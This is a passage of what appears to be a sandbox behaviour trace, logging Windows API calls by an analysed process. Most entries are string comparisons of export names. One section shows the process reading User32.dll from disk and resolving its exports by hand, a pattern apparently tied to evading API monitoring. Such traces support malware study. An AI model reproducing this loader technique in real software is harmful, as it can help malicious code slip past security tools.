(lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0212.718] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0212.718] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0212.718] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0212.718] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0212.718] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0212.719] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0212.720] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0212.720] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0212.721] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0213.052] GetProcessHeap () returned 0x4a0000 [0213.053] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x4a0000) returned 1 [0213.055] GetProcessHeap () returned 0x4a0000 [0213.056] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9120 [0213.056] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0213.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0213.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0213.057] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0213.057] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0213.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0213.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0213.058] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0213.058] GetProcessHeap () returned 0x4a0000 [0213.058] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1555b8) returned 0x4113040 [0213.062] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0213.062] ReadFile (in: hFile=0x17c, lpBuffer=0x4113040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4113040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0213.436] CloseHandle (hObject=0x17c) returned 1 [0213.437] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0213.437] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0213.437] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0213.437] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0213.437] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0213.437] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0213.437] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0213.437] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0213.437] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0213.437] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0213.437] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0213.437] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0213.437] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0213.437] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0213.437] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0213.438] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0213.438] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0213.438] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0213.438] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0213.438] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0213.438] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0213.438] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0213.438] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0213.438] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0213.438] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0213.438] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0213.438] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0213.438] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0213.438] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0213.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0213.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0213.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0213.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0213.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0213.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0213.439] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0213.439] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0213.439] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0213.439] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0213.439] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0213.439] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0213.440] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0213.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0213.441] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0213.441] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0213.441] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0213.441] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0213.441] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0213.441] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0213.441] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0213.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0213.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0213.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0213.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0213.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0213.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0213.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0213.442] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0213.442] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0213.443] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0213.443] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0213.443] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0213.443] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0213.443] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0213.443] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0213.443] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0213.443] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0213.444] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0213.444] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0213.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0213.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0213.445] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0213.445] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0213.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0213.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0213.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0213.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0213.446] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0213.725] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0213.725] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0213.725] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0213.725] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0213.725] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0213.726] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0213.727] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 